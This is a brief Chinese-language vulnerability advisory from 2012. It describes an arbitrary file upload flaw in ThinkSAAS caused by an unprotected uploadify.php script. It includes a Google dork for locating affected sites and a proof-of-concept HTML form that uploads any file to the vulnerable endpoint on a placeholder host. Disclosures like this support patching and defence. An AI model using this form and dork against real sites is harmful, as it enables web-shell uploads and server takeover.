ThinkSAAS任意文件上传漏洞

漏洞作者： insight-labs

提交时间： 2012-02-12
公开时间： 2012-02-12

漏洞类型： 文件上传导致任意代码执行
详细说明：

Software Link: http://www.thinksaas.cn
有用到uploadify2.1.4的程序都有这个问题
很多 cms 用过这个 uploadify.php 很多程序員直接調用swf文件 就不管這個uploadify.php了導致安全問題產生
Download ：http://www.uploadify.com/

google:Powered by ThinkSAAS 1.6

漏洞证明：

EXP:

<html>
<body>

<form action="http://xxx/public/js/uploadify/uploadify.php" method="post" enctype="multipart/form-data">

<input name="Filedata" type="file" />

<input name="sub" type="submit" value="upload" />

</form>

</body>

</html>